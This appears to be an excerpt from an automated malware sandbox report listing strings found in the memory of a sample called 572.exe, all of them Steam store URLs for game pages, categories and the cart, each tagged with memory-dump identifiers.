                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/611670/The_Elder_Scrolls_V_Skyrim_VR/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/668580/Atomic_Heart/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/755500/ONE_PIECE_World_Seeker/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/814370/Monster_Sanctuary/?snr=1_4_4__43_1
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/814370/Monster_Sanctuary/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/845890/Moonbreaker/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/850190/Goat_Simulator_3/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/881020/Granblue_Fantasy_Relink/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/882590/Outcast_Tales_The_First_Journey/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/939400?snr=1_4_4__40_3
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/990080/Hogwarts_Legacy/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/990080?snr=1_4_4__40_1
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/cart/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/action/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/action_fps/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/action_run_jump/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/action_tps/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/adventure/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/adventure_rpg/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/anime/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/arcade_rhythm/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/casual/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/exploration_open_world/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/fighting_martial_arts/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/hack_and_slash/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/hidden_object/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/horror/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/metroidvania/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/multiplayer/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/multiplayer_coop/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/multiplayer_lan/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/multiplayer_local_party/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/multiplayer_mmo/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/multiplayer_online_competitive/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/mystery_detective/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/puzzle_matching/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/racing/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/racing_sim/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rogue_like_rogue_lite/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg_action/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg_jrpg/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg_party_based/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg_strategy_tactics/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg_turn_based/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/science_fiction/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/shmup/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_building_automation/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_dating/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_farming_crafting/?snr=1_4_4__12
